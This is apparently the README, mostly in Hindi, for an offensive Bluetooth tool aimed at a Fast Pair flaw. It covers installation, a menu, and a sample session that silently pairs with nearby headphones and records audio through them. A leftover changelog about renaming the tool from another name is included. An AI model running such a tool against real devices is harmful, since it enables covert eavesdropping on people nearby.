
BLUE-SPY (Bluetooth Low Energy Universal Exploit - Security Penetration Testing) is a professional security assessment tool for analyzing CVE-2025-36911 vulnerabilities in Google's Fast Pair protocol implementation.
⚠️ यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा अनुसंधान और नैतिक परीक्षण के लिए है ⚠️
इस उपकरण का अनधिकृत उपयोग उन उपकरणों के खिलाफ जिनके आप मालिक नहीं हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है और इसके परिणामस्वरूप:
इस उपकरण का उपयोग करके, आप अपने कार्यों की पूर्ण जिम्मेदारी स्वीकार करते हैं और मानते हैं।
BLUE-SPY (ब्लूटूथ लो एनर्जी यूनिवर्सल एक्सप्लॉइट - सिक्योरिटी पेनिट्रेशन टेस्टिंग) Google के फास्ट पेयर प्रोटोकॉल कार्यान्वयन में CVE-2025-36911 कमजोरियों का विश्लेषण करने के लिए एक पेशेवर सुरक्षा मूल्यांकन उपकरण है। यह उपकरण प्रदान करता है:
git clone https://github.com/Athexhacker/BLUE-SPY.git
cd BLUE-SPY
sudo apt-get update
sudo apt-get install -y \
python3-pip \
bluetooth \
bluez \
bluez-tools \
libbluetooth-dev \
libglib2.0-dev \
pulseaudio \
pulseaudio-module-bluetooth \
sox \
pavucontrol
sudo apt-get install -y python3-dev
# Option A: वैश्विक रूप से इंस्टॉल करें (यदि आप जानते हैं कि आप क्या कर रहे हैं)
pip3 install bleak dbus-python cryptography --break-system-packages
# Option B: अनुशंसित - वर्चुअल एनवायरनमेंट का उपयोग करें
python3 -m venv BLUE-SPY-env
source BLUE-SPY-env/bin/activate
pip install bleak dbus-python cryptography
# अतिरिक्त ऑडियो निर्भरताएँ इंस्टॉल करें
pip install pyaudio wave
# ब्लूटूथ एडेप्टर स्थिति जाँचें
hciconfig -a
# मौजूदा ब्लूटूथ सेवा रोकें
sudo systemctl stop bluetooth
# ब्लूटूथ सेवा सक्षम और पुनः प्रारंभ करें
sudo systemctl enable bluetooth
sudo systemctl start bluetooth
# ब्लूटूथ स्थिति जाँचें
sudo systemctl status bluetooth
# एडेप्टर को डिस्कवरेबल और पेयरेबल बनाएं
sudo hciconfig hci0 piscan
# यदि आवश्यक हो तो ब्लूटूथ स्टैक रीसेट करें
sudo hciconfig hci0 reset
# ब्लूटूथ कार्यक्षमता परीक्षण
bluetoothctl list
# पायथन इम्पोर्ट जाँचें
python3 -c "from bleak import BleakScanner; print('Bleak OK')"
# उपकरण चलाएं
sudo python3 BLUE-SPY.py
# 1. क्लोन करें और निर्देशिका में प्रवेश करें
git clone https://github.com/Athexhacker/BLUE-SPY.git
cd BLUE-SPY
# 2. निर्भरताएँ इंस्टॉल करें (जैसा ऊपर दिखाया गया है)
sudo apt-get install -y bluetooth bluez python3-pip
pip3 install bleak cryptography
# 3. रूट विशेषाधिकारों के साथ चलाएं
sudo python3 BLUE-SPY.py
# 4. जब संकेत दिया जाए तब जिम्मेदारी स्वीकार करें
टाइप करें: I ACCEPT RESPONSIBILITY
# 5. स्कैनिंग शुरू करें
विकल्प चुनें: 1 (त्वरित स्कैन)
# हमेशा रूट विशेषाधिकारों के साथ चलाएं (ब्लूटूथ के लिए आवश्यक)
sudo python3 BLUE-SPY.py
========================================================================
BLUE-SPY - फास्ट पेयर एक्सप्लॉइट इंजन v2.0
CVE-2025-36911 अनुसंधान और विश्लेषण उपकरण
========================================================================
पेशेवर ब्लूटूथ सुरक्षा मूल्यांकन
केवल अधिकृत उपयोग
========================================================================
मुख्य मेनू:
[1] त्वरित डिवाइस स्कैन (10 सेकंड)
[2] सतत नेटवर्क स्कैन (60+ सेकंड)
[3] विशिष्ट डिवाइस को लक्षित करें
[4] उन्नत शोषण
[5] पिछले परिणाम देखें
[0] बाहर निकलें
Google के फास्ट पेयर प्रोटोकॉल का उपयोग करने वाले उपकरणों को स्कैन करता है। अवधि विकल्प:
आउटपुट: भेद्यता रेटिंग (क्रिटिकल/हाई/मीडियम/लो) के साथ सभी फास्ट पेयर उपकरणों की सूची।
रीयल-टाइम में सभी ब्लूटूथ उपकरणों को प्रदर्शित करता है, भेद्यता रेटिंग के साथ फास्ट पेयर उपकरणों को हाइलाइट करता है। दिखाता है:
MAC पते द्वारा किसी विशिष्ट डिवाइस को लक्षित करने की अनुमति देता है, जिसमें शामिल विस्तृत विश्लेषण:
सभी सहेजे गए स्कैन परिणामों, शोषण प्रयासों और ऑडियो कैप्चर को ब्राउज़ करें।
# 1. उपकरण प्रारंभ करें
sudo python3 BLUE-SPY.py
# 2. जिम्मेदारी स्वीकार करें
टाइप करें: I ACCEPT RESPONSIBILITY
# 3. त्वरित स्कैन से शुरू करें
विकल्प चुनें: 1
स्कैन प्रकार चुनें: 1 (10-सेकंड स्कैन)
# आउटपुट:
3 फास्ट पेयर डिवाइस मिले:
1. [क्रिटिकल] Sony WH-1000XM4
पता: 11:22:33:44:55:66
मॉडल: abcd1234, RSSI: -45dBm
स्थिति: क्रिटिकल - अत्यधिक कमजोर
2. [मध्यम] Galaxy Buds Pro
पता: AA:BB:CC:DD:EE:FF
मॉडल: efgh5678, RSSI: -62dBm
स्थिति: मध्यम - संभावित रूप से कमजोर
# 4. परीक्षण के लिए विशिष्ट डिवाइस को लक्षित करें
विकल्प चुनें: 5
डिवाइस नंबर चुनें: 1
आगे बढ़ने के लिए 'EXPLOIT' टाइप करें: EXPLOIT
# 5. परिणामों की समीक्षा करें
शोषण परिणाम: पेयरिंग सफल
[सफल] डिवाइस से समझौता हो सकता है।
# 6. HFP कनेक्शन का परीक्षण करें
HFP कनेक्शन का परीक्षण करें? (y/n): y
[क्रिटिकल] HFP ऑडियो एक्सेस की पुष्टि!
# 7. ऑडियो कैप्चर का प्रयास करें (केवल अधिकृत परीक्षण)
ऑडियो कैप्चर का प्रयास करें? (y/n): y
[सफल] ऑडियो सफलतापूर्वक कैप्चर किया गया!
फ़ाइल: blue_spy_results/audio/capture_112233445566_20250120_093022.wav
BLUE-SPY सभी परिणामों को स्वचालित रूप से व्यवस्थित निर्देशिकाओं में सहेजता है:
blue_spy_results/
├── scans/
│ ├── scan_20250120_093022.json
│ ├── all_devices_20250120_093022.json
│ └── target_112233445566_20250120_094155.json
├── exploits/
│ ├── exploit_112233445566_20250120_094155.json
│ └── batch_20250120_095233.json
└── audio/
└── capture_112233445566_20250120_094230.wav
{
"timestamp": "2026-01-20T09:30:22.123456",
"device_count": 3,
"devices": [
{
"address": "11:22:33:44:55:66",
"name": "Sony WH-1000XM4",
"rssi": -45,
"model_id": "abcd1234",
"flags": 0,
"tx_power": 4,
"vulnerability_status": "क्रिटिकल - अत्यधिक कमजोर",
"vulnerability_score": 75,
"vulnerability_reasons": [
"मूक युग्मन संभव",
"कोई पासकी आवश्यक नहीं"
]
}
]
}
# समस्या: ब्लूटूथ एडेप्टर नहीं मिला
# समाधान: एडेप्टर जाँचें और रीसेट करें
hciconfig -a
sudo hciconfig hci0 reset
# समस्या: अनुमति अस्वीकृत
# समाधान: हमेशा sudo के साथ चलाएं
sudo python3 BLUE-SPY.py
# समस्या: कोई डिवाइस नहीं मिला
# समाधान: सुनिश्चित करें एडेप्टर डिस्कवरेबल है
sudo hciconfig hci0 piscan
bluetoothctl
scan on
# समस्या: कनेक्शन विफलता
# समाधान: ब्लूटूथ स्टैक रीसेट करें
sudo systemctl restart bluetooth
sudo hciconfig hci0 reset
# समस्या: bleak इम्पोर्ट त्रुटि
pip3 install --upgrade bleak
# समस्या: cryptography त्रुटियाँ
pip3 install --upgrade cryptography
# समस्या: dbus-python समस्याएँ
sudo apt-get install python3-dbus
# जाँचें कि ब्लूटूथ काम कर रहा है या नहीं
bluetoothctl
# bluetoothctl में:
list # उपलब्ध एडेप्टर दिखाएं
show # एडेप्टर विवरण दिखाएं
scan on # स्कैनिंग शुरू करें
# डिवाइस दिखने तक प्रतीक्षा करें
scan off # स्कैनिंग रोकें
devices # खोजे गए डिवाइस सूचीबद्ध करें
exit
यदि आप इस उपकरण का उपयोग करके कमजोरियों की खोज करते हैं:
यह सॉफ़्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया जाता है। लेखक और योगदानकर्ता:
इस सॉफ़्टवेयर का उपयोग करके, आप सहमत हैं:
प्रमुख परिवर्तन किए:
1. **सभी उदाहरणों का नाम बदला** "WHISPER" से "BLUE-SPY" में पूरे दस्तावेज़ में
2. **बैनर अपडेट किया** WHISPER के बजाय BLUE-SPY दिखाने के लिए
3. **रिपॉजिटरी URL बदले** `whisper.git` से `blue-spy.git` में
4. **निर्देशिका नाम बदले** `whisper_results` से `blue_spy_results` में
5. **उपकरण नाम संशोधित किया** सभी कमांड उदाहरणों में
6. **बैनर ASCII कला अपडेट की** BLUE-SPY को दर्शाने के लिए
7. **सभी संदर्भ बदले** शीर्षकों, पादलेखों और विवरणों में
8. **अधिक प्रमुख कानूनी चेतावनियाँ जोड़ीं** जोर देने के लिए इमोजी के साथ
9. **स्क्रीनशॉट प्लेसहोल्डर्स को अपडेट किया** सामान्य विवरणों में (चूंकि वास्तविक स्क्रीनशॉट को अपडेट करने की आवश्यकता होगी)
| रेटिंग | स्कोर | विवरण |
|---|
| क्रिटिकल | 60-100 | अत्यधिक कमजोर - मूक युग्मन संभव |
| उच्च | 40-59 | संभावित रूप से कमजोर - सुरक्षा फ्लैग गायब |
| मध्यम | 20-39 | संभावित रूप से कमजोर - जांच की आवश्यकता |
| निम्न | 0-19 | संभवतः पैच किया गया - सुरक्षित प्रतीत होता है |